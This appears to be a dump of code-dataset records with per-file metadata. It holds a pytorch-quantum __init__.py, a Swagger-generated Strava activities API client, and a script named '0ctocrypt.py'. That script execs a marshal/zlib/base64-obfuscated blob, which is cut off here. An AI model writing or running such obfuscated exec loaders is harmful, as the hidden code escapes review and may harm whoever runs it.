2021-12-19T14:04:58.000Z
|
examples/core/models/__init__.py
|
zyh1999/pytorch-quantum
|
c00bd564a99001fee2fd6b30e5e34562ab981e28
|
[
"MIT"
] | 2
|
2021-02-11T19:01:48.000Z
|
2021-04-04T20:29:57.000Z
|
examples/core/models/__init__.py
|
zyh1999/pytorch-quantum
|
c00bd564a99001fee2fd6b30e5e34562ab981e28
|
[
"MIT"
] | 12
|
2021-07-23T07:10:47.000Z
|
2021-12-16T23:44:44.000Z
|
from .t_models import *
from .c_models import *
from .q_models import *
from .layer_regression import *
| 17.5
| 31
| 0.761905
| 16
| 105
| 4.75
| 0.5
| 0.473684
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161905
| 105
| 5
| 32
| 21
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
865e40a82364d0eae787a897035f5905b9996aef
| 39,072
|
py
|
Python
|
strava/swagger_client/api/activities_api.py
|
neozenith/strava-gsheet-python
|
cce24721d6dcae69638c99261308f3d76512a087
|
[
"MIT"
] | null | null | null |
strava/swagger_client/api/activities_api.py
|
neozenith/strava-gsheet-python
|
cce24721d6dcae69638c99261308f3d76512a087
|
[
"MIT"
] | null | null | null |
strava/swagger_client/api/activities_api.py
|
neozenith/strava-gsheet-python
|
cce24721d6dcae69638c99261308f3d76512a087
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Strava API v3
The [Swagger Playground](https://developers.strava.com/playground) is the easiest way to familiarize yourself with the Strava API by submitting HTTP requests and observing the responses before you write any client code. It will show what a response will look like with different endpoints depending on the authorization scope you receive from your athletes. To use the Playground, go to https://www.strava.com/settings/api and change your “Authorization Callback Domain” to developers.strava.com. Please note, we only support Swagger 2.0. There is a known issue where you can only select one scope at a time. For more information, please check the section “client code” at https://developers.strava.com/docs. # noqa: E501
OpenAPI spec version: 3.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class ActivitiesApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Initializes the API wrapper.

    :param api_client: optional ApiClient to reuse; when omitted a fresh
        default client is constructed.
    """
    # Only substitute the default when the caller passed nothing at all.
    self.api_client = ApiClient() if api_client is None else api_client
def create_activity(self, name, type, start_date_local, elapsed_time, description, distance, trainer, commute, **kwargs):  # noqa: E501
    """Create an Activity  # noqa: E501

    Creates a manual activity for an athlete, requires activity:write scope.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the deserialized response.

    :param async_req bool
    :param str name: (required)
    :param str type: (required)
    :param datetime start_date_local: (required)
    :param int elapsed_time: (required)
    :param str description: (required)
    :param float distance: (required)
    :param int trainer: (required)
    :param int commute: (required)
    :return: DetailedActivity
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths delegate to the *_with_http_info
    # variant with identical arguments, so a single call suffices.
    return self.create_activity_with_http_info(
        name, type, start_date_local, elapsed_time, description, distance,
        trainer, commute, **kwargs)  # noqa: E501
def create_activity_with_http_info(self, name, type, start_date_local, elapsed_time, description, distance, trainer, commute, **kwargs):  # noqa: E501
    """Create an Activity  # noqa: E501

    Creates a manual activity for an athlete, requires activity:write scope.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.

    :param async_req bool
    :param str name: (required)
    :param str type: (required)
    :param datetime start_date_local: (required)
    :param int elapsed_time: (required)
    :param str description: (required)
    :param float distance: (required)
    :param int trainer: (required)
    :param int commute: (required)
    :return: DetailedActivity
             If the method is called asynchronously,
             returns the request thread.
    """
    # Every endpoint parameter is both mandatory and sent as form data.
    form_fields = ['name', 'type', 'start_date_local', 'elapsed_time',
                   'description', 'distance', 'trainer', 'commute']
    all_params = form_fields + ['async_req', '_return_http_data_only',
                                '_preload_content', '_request_timeout']  # noqa: E501
    params = locals()
    # Reject unknown keyword arguments, then fold the known ones in.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_activity" % key
            )
        params[key] = val
    del params['kwargs']
    # Verify each required parameter is present and non-None.
    for field in form_fields:
        if params.get(field) is None:
            raise ValueError("Missing the required parameter `%s` when calling `create_activity`" % field)  # noqa: E501

    form_params = [(field, params[field])
                   for field in form_fields if field in params]  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['multipart/form-data']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = ['strava_oauth']  # noqa: E501

    return self.api_client.call_api(
        '/activities', 'POST',
        {},
        [],
        header_params,
        body=None,
        post_params=form_params,
        files={},
        response_type='DetailedActivity',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_activity_by_id(self, id, **kwargs):  # noqa: E501
    """Get Activity  # noqa: E501

    Returns the given activity that is owned by the authenticated athlete. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the deserialized response.

    :param async_req bool
    :param int id: The identifier of the activity. (required)
    :param bool include_all_efforts: To include all segments efforts.
    :return: DetailedActivity
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths delegate to the *_with_http_info
    # variant with identical arguments, so a single call suffices.
    return self.get_activity_by_id_with_http_info(id, **kwargs)  # noqa: E501
def get_activity_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Get Activity  # noqa: E501

    Returns the given activity that is owned by the authenticated athlete. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.

    :param async_req bool
    :param int id: The identifier of the activity. (required)
    :param bool include_all_efforts: To include all segments efforts.
    :return: DetailedActivity
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['id', 'include_all_efforts', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout']  # noqa: E501
    params = locals()
    # Reject unknown keyword arguments, then fold the known ones in.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_activity_by_id" % key
            )
        params[key] = val
    del params['kwargs']
    # `id` is a positional parameter and must be non-None.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `get_activity_by_id`")  # noqa: E501

    path_params = {'id': params['id']}  # noqa: E501
    # Only forward the optional flag when the caller supplied it.
    query_params = ([('include_all_efforts', params['include_all_efforts'])]  # noqa: E501
                    if 'include_all_efforts' in params else [])

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = ['strava_oauth']  # noqa: E501

    return self.api_client.call_api(
        '/activities/{id}', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='DetailedActivity',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_comments_by_activity_id(self, id, **kwargs):  # noqa: E501
    """List Activity Comments  # noqa: E501

    Returns the comments on the given activity. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the deserialized response.

    :param async_req bool
    :param int id: The identifier of the activity. (required)
    :param int page: Page number. Defaults to 1.
    :param int per_page: Number of items per page. Defaults to 30.
    :return: list[Comment]
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths delegate to the *_with_http_info
    # variant with identical arguments, so a single call suffices.
    return self.get_comments_by_activity_id_with_http_info(id, **kwargs)  # noqa: E501
def get_comments_by_activity_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """List Activity Comments  # noqa: E501

    Returns the comments on the given activity. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.

    :param async_req bool
    :param int id: The identifier of the activity. (required)
    :param int page: Page number. Defaults to 1.
    :param int per_page: Number of items per page. Defaults to 30.
    :return: list[Comment]
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['id', 'page', 'per_page', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout']  # noqa: E501
    params = locals()
    # Reject unknown keyword arguments, then fold the known ones in.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_comments_by_activity_id" % key
            )
        params[key] = val
    del params['kwargs']
    # `id` is a positional parameter and must be non-None.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `get_comments_by_activity_id`")  # noqa: E501

    path_params = {'id': params['id']}  # noqa: E501
    # Pagination options are only forwarded when explicitly supplied.
    query_params = [(option, params[option])
                    for option in ('page', 'per_page') if option in params]  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = ['strava_oauth']  # noqa: E501

    return self.api_client.call_api(
        '/activities/{id}/comments', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='list[Comment]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_kudoers_by_activity_id(self, id, **kwargs):  # noqa: E501
    """List Activity Kudoers  # noqa: E501

    Returns the athletes who kudoed an activity identified by an identifier. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the deserialized response.

    :param async_req bool
    :param int id: The identifier of the activity. (required)
    :param int page: Page number. Defaults to 1.
    :param int per_page: Number of items per page. Defaults to 30.
    :return: list[SummaryAthlete]
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths delegate to the *_with_http_info
    # variant with identical arguments, so a single call suffices.
    return self.get_kudoers_by_activity_id_with_http_info(id, **kwargs)  # noqa: E501
def get_kudoers_by_activity_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """List Activity Kudoers  # noqa: E501

    Returns the athletes who kudoed an activity identified by an identifier. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.

    :param async_req bool
    :param int id: The identifier of the activity. (required)
    :param int page: Page number. Defaults to 1.
    :param int per_page: Number of items per page. Defaults to 30.
    :return: list[SummaryAthlete]
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['id', 'page', 'per_page', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout']  # noqa: E501
    params = locals()
    # Reject unknown keyword arguments, then fold the known ones in.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_kudoers_by_activity_id" % key
            )
        params[key] = val
    del params['kwargs']
    # `id` is a positional parameter and must be non-None.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `get_kudoers_by_activity_id`")  # noqa: E501

    path_params = {'id': params['id']}  # noqa: E501
    # Pagination options are only forwarded when explicitly supplied.
    query_params = [(option, params[option])
                    for option in ('page', 'per_page') if option in params]  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = ['strava_oauth']  # noqa: E501

    return self.api_client.call_api(
        '/activities/{id}/kudos', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='list[SummaryAthlete]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_laps_by_activity_id(self, id, **kwargs):  # noqa: E501
    """List Activity Laps  # noqa: E501

    Returns the laps of an activity identified by an identifier. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the deserialized response.

    :param async_req bool
    :param int id: The identifier of the activity. (required)
    :return: list[Lap]
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths delegate to the *_with_http_info
    # variant with identical arguments, so a single call suffices.
    return self.get_laps_by_activity_id_with_http_info(id, **kwargs)  # noqa: E501
def get_laps_by_activity_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """List Activity Laps  # noqa: E501

    Returns the laps of an activity identified by an identifier. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.

    :param async_req bool
    :param int id: The identifier of the activity. (required)
    :return: list[Lap]
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['id', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501
    params = locals()
    # Reject unknown keyword arguments, then fold the known ones in.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_laps_by_activity_id" % key
            )
        params[key] = val
    del params['kwargs']
    # `id` is a positional parameter and must be non-None.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `get_laps_by_activity_id`")  # noqa: E501

    path_params = {'id': params['id']}  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = ['strava_oauth']  # noqa: E501

    return self.api_client.call_api(
        '/activities/{id}/laps', 'GET',
        path_params,
        [],
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='list[Lap]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_logged_in_athlete_activities(self, **kwargs):  # noqa: E501
    """List Athlete Activities  # noqa: E501

    Returns the activities of an athlete for a specific identifier.
    Requires activity:read. Only Me activities will be filtered out
    unless requested by a token with activity:read_all.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_logged_in_athlete_activities(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int before: An epoch timestamp to use for filtering activities that have taken place before a certain time.
    :param int after: An epoch timestamp to use for filtering activities that have taken place after a certain time.
    :param int page: Page number. Defaults to 1.
    :param int per_page: Number of items per page. Defaults to 30.
    :return: list[SummaryActivity]
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always wants just the payload, so force
    # the flag before delegating to the low-level variant.
    kwargs['_return_http_data_only'] = True
    # Sync calls yield deserialized data; async calls yield the request
    # thread. Either way the delegate's result is returned unchanged.
    return self.get_logged_in_athlete_activities_with_http_info(**kwargs)  # noqa: E501
def get_logged_in_athlete_activities_with_http_info(self, **kwargs):  # noqa: E501
    """List Athlete Activities  # noqa: E501

    Returns the activities of an athlete for a specific identifier.
    Requires activity:read. Only Me activities will be filtered out
    unless requested by a token with activity:read_all.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_logged_in_athlete_activities_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int before: An epoch timestamp to use for filtering activities that have taken place before a certain time.
    :param int after: An epoch timestamp to use for filtering activities that have taken place after a certain time.
    :param int page: Page number. Defaults to 1.
    :param int per_page: Number of items per page. Defaults to 30.
    :return: list[SummaryActivity]
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied.
    """
    # Endpoint parameters plus the client-level options every generated
    # method accepts; anything else is a caller mistake.
    all_params = ['before', 'after', 'page', 'per_page',
                  'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    # Explicit dict build replaces the old locals()/six.iteritems()
    # harvesting; dict.items() behaves identically and drops the six shim.
    params = {}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_logged_in_athlete_activities" % key
            )
        params[key] = val

    collection_formats = {}
    path_params = {}

    query_params = []
    if 'before' in params:
        query_params.append(('before', params['before']))  # noqa: E501
    if 'after' in params:
        query_params.append(('after', params['after']))  # noqa: E501
    if 'page' in params:
        query_params.append(('page', params['page']))  # noqa: E501
    if 'per_page' in params:
        query_params.append(('per_page', params['per_page']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['strava_oauth']  # noqa: E501

    return self.api_client.call_api(
        '/athlete/activities', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[SummaryActivity]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_zones_by_activity_id(self, id, **kwargs):  # noqa: E501
    """Get Activity Zones  # noqa: E501

    Summit Feature. Returns the zones of a given activity.
    Requires activity:read for Everyone and Followers activities.
    Requires activity:read_all for Only Me activities.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_zones_by_activity_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: The identifier of the activity. (required)
    :return: list[ActivityZone]
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always wants just the payload, so force
    # the flag before delegating to the low-level variant.
    kwargs['_return_http_data_only'] = True
    # Sync calls yield deserialized data; async calls yield the request
    # thread. Either way the delegate's result is returned unchanged.
    return self.get_zones_by_activity_id_with_http_info(id, **kwargs)  # noqa: E501
def get_zones_by_activity_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Get Activity Zones  # noqa: E501

    Summit Feature. Returns the zones of a given activity.
    Requires activity:read for Everyone and Followers activities.
    Requires activity:read_all for Only Me activities.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_zones_by_activity_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: The identifier of the activity. (required)
    :return: list[ActivityZone]
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied.
    :raises ValueError: if `id` is None.
    """
    # Endpoint parameters plus the client-level options every generated
    # method accepts; anything else is a caller mistake.
    all_params = ['id', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    # Explicit dict build replaces the old locals()/six.iteritems()
    # harvesting; dict.items() behaves identically and drops the six shim.
    params = {'id': id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_zones_by_activity_id" % key
            )
        params[key] = val

    # verify the required parameter 'id' is set
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `get_zones_by_activity_id`")  # noqa: E501

    collection_formats = {}
    path_params = {'id': params['id']}  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['strava_oauth']  # noqa: E501

    return self.api_client.call_api(
        '/activities/{id}/zones', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[ActivityZone]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_activity_by_id(self, id, **kwargs):  # noqa: E501
    """Update Activity  # noqa: E501

    Updates the given activity that is owned by the authenticated
    athlete. Requires activity:write. Also requires activity:read_all
    in order to update Only Me activities  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_activity_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: The identifier of the activity. (required)
    :param UpdatableActivity body:
    :return: DetailedActivity
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always wants just the payload, so force
    # the flag before delegating to the low-level variant.
    kwargs['_return_http_data_only'] = True
    # Sync calls yield deserialized data; async calls yield the request
    # thread. Either way the delegate's result is returned unchanged.
    return self.update_activity_by_id_with_http_info(id, **kwargs)  # noqa: E501
def update_activity_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Update Activity  # noqa: E501

    Updates the given activity that is owned by the authenticated
    athlete. Requires activity:write. Also requires activity:read_all
    in order to update Only Me activities  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_activity_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: The identifier of the activity. (required)
    :param UpdatableActivity body:
    :return: DetailedActivity
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied.
    :raises ValueError: if `id` is None.
    """
    # Endpoint parameters plus the client-level options every generated
    # method accepts; anything else is a caller mistake.
    all_params = ['id', 'body', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    # Explicit dict build replaces the old locals()/six.iteritems()
    # harvesting; dict.items() behaves identically and drops the six shim.
    params = {'id': id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_activity_by_id" % key
            )
        params[key] = val

    # verify the required parameter 'id' is set
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `update_activity_by_id`")  # noqa: E501

    collection_formats = {}
    path_params = {'id': params['id']}  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    # The request body is optional; absent means no payload is sent.
    body_params = params.get('body')

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['strava_oauth']  # noqa: E501

    return self.api_client.call_api(
        '/activities/{id}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='DetailedActivity',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
| 43.901124
| 726
| 0.625358
| 4,704
| 39,072
| 4.973002
| 0.057185
| 0.047194
| 0.019151
| 0.024623
| 0.920104
| 0.895311
| 0.886932
| 0.881247
| 0.860044
| 0.858077
| 0
| 0.015913
| 0.285882
| 39,072
| 889
| 727
| 43.950506
| 0.822486
| 0.382038
| 0
| 0.728601
| 0
| 0
| 0.195946
| 0.041577
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035491
| false
| 0
| 0.008351
| 0
| 0.096033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86a6e8cb25a4f235668ab4cdbca6daf1cafd3d79
| 3,844
|
py
|
Python
|
0ctocrypt.py
|
Matrix-jailer/0ctocrypt
|
4d2d280449f70ccb4ef2cb3749072b3ab06b658f
|
[
"MIT"
] | 2
|
2020-07-20T18:13:58.000Z
|
2020-07-22T05:48:22.000Z
|
0ctocrypt.py
|
Matrix-jailer/0ctocrypt
|
4d2d280449f70ccb4ef2cb3749072b3ab06b658f
|
[
"MIT"
] | null | null | null |
0ctocrypt.py
|
Matrix-jailer/0ctocrypt
|
4d2d280449f70ccb4ef2cb3749072b3ab06b658f
|
[
"MIT"
] | null | null | null |
# Compiled By [ Matrix Society ]
# Github : https://github.com/Matrix-jailer
# Email : Matrixjailer@gmail.com
# SECURITY NOTE(review): the statement following this import block exec()s a
# marshal-serialized code object hidden inside a zlib-compressed,
# base64-encoded blob. The real program logic is therefore opaque and cannot
# be audited from this file alone -- treat it as untrusted and do not run it
# outside a sandbox.
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("eJztWc1zE8kV79GnNbb8CbaBBQY7QXLZluUPPkyAZWGXj0qEVFoWsLwue6RubAlJIzQjwERWUUUOOWylSMWwWRYqlb3kltpDKlXZS6o2f0a4xNe95LD3pN/raWlky4Bhl70wkntef7zX7/de63W/dobYj4v/neF/5jcKIZSQ3xCS4oRCqIvkFZJSJO0iKZek3STllrSHpDyS9pKUV9I+kvIR6kaBfsK8JNdGqIc8UIjC/OQBIQr1YmeAUJ+c1o+ESpgqRrSRVDu5+yVh7YTTN12kPK00iwqIgQFy4SLrIFSF1lSQsCCh7chwYBMDn6WjTgXqVLBFmxhHO0GJW19IDF2itZvPyBuv0R6pfC8SnYT2kVQXobtIqpvQ3STVQ2g/SfW2tAHrFPoPcGl0EIo9UOyFYh8U70GxHyX3EbaL0AOI6u8K60POIgFrfxw+yH2YUWyHuvnfOXAqFHdPkip6dODDhShZU4hFSE4hORepKqiKXXejPMtDcl4QCT232jk+wqWDwMsmiFeXf73rrxf+c896P+zjVQt6zFXTgoppUaNiWV5O3ilnLYbUjXzFXOFS+dhsQTSZecZKYVDUApH3sGRhWI5YmNBFl1FmTLfK2bt+aG2DPqVH6VaCSvZ//Lmcca5iBNwJQhEtOgl0d6Huj7kG++YnfzE9WVBVVcNnUWv5LIpnm07gXaSxWCwd2TQkotO4fNJ6ZBPfGPIAO02ENK02x2vOAQ1eW4KzU4/FEjVNW5pLc/6roq025BSwmb1JAI0N1QR1VXVIXeIYtmVvCOCah5xsXA0bfLUFVzxeteEm6ly2MTlfLFbV4olQbWjOwZAYqi3NxbUq7wXTIIOKzpoqSA1iUtdaLaTF47Y8wS54eONSreYcr6IewnCxtG67qw5sifOG6vBtTXWhQ22OI1S1k3WNlsBhKIJPavDXGZAUx7dmcCWQmYOuhepGip1uMpttgNinMLFh6yLmNUCViRgawOYZ0+0ltCSWCjBxncao4x2iscaEyCHMNlOwrTAHuB3rdGmLs0L1Pm4rXXCA4bQxgRxUbojYwu5krTMgvzScJta6EIIOS1yFR5CSVaxvaSTgn2v6edQalotfWoLnklB/ookXfRlLoAkdq7tu+zQIuDQGD/KDAR2Kak2LfcnZ3jBg+jI8tMl0jf6Q2qK10V1DrWshjEHgq2ghDNEv2SaD39YwCLEzbywb/dDmwXDnHsRAmskzvVwPgooMggGCEZBvHO/in+h8F//exT8Jufl5F/9+8vhHtg99cO7LFk2IfsdkM9n7ds65T76A5x/inJuEiZMYqWHiJAxMQixOQhzGGJvEcf5WODC6pzafYTPy5OqXMB7JwG0RqRrPoNY4tgQclUXq8OHCWUTnAig8h0JoiCbng6SHG4ED5qbjBO/r3zPgGNGG4G8NcbxynjYhQYgTyY8VIDnVTqbEIboDDQPKaqoZIfW95NwKy9zMFpe1DyrWCita2YxuZY2iZkevX7LVSCTCWcBK1YnxT7UsF0fqtkVTB02Vl78ydMoF8eHmaEP+eT2bZ1SzDC3JeCJwm+FEUvxNFJ9F64MMsx3ENSSF2+XWittlWS8us4bXNvkUU5k8K6JvLWgx7LSGpzesIPIV2Fr1YraAKDFvybZetXmhhA7N/ehor6IqPlcfd/yQ0oO1oCLyonKFSdOekdCPFeZtkKN2fUFL8O3eZFqibNzO0mZLcEPb1GnN0riQ4yxNJ6eP06PH6exUNJqZSs/OTmWOsOkj+rGoPjVr7pczTRXGWz7mUGOEdo3lM0aBgSNERqZ9bGSyzFrVRJKn501mzsGvkC6PGyVW1FYsq2SemJjQS9nInRXdMvVSKcJlTJisSN8vrRhFdmp2anpyOjo1eSQ6Gz1ssbvWqcOmUSln2KnDVLf0U4c